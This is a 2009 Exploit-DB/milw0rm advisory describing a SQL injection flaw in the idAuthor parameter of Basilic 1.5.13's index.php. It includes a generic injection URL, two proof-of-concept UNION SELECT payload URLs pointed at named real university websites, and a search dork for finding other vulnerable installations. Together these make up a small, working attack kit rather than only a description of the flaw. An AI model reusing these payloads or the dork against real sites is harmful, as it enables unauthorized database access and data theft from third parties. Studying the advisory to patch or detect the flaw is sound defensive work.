Basilic 1.5.13 - 'index.php?idAuthor' SQL Injection

EDB-ID:

9246

Author:

NoGe

Type:

webapps

Platform:

PHP

Published:

2009-07-24

==================================================================================================


  [o] Basilic 1.5.13 SQL Injection Vulnerability

       Software : Basilic version 1.5.13
       Vendor   : http://artis.imag.fr/Software/Basilic/
       Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==================================================================================================


  [o] Vulnerable file


       index.php



  [o] Exploit

       http://localhost/[path]/index.php?idAuthor=[SQL]



  [o] Proof of concept

       http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
       http://www.iarc.uaf.edu/publications/allpubs.php?idAuthor=-19+union+select+1,version()--



  [o] Dork

       "Powered by Basilic"


==================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================

# milw0rm.com [2009-07-24]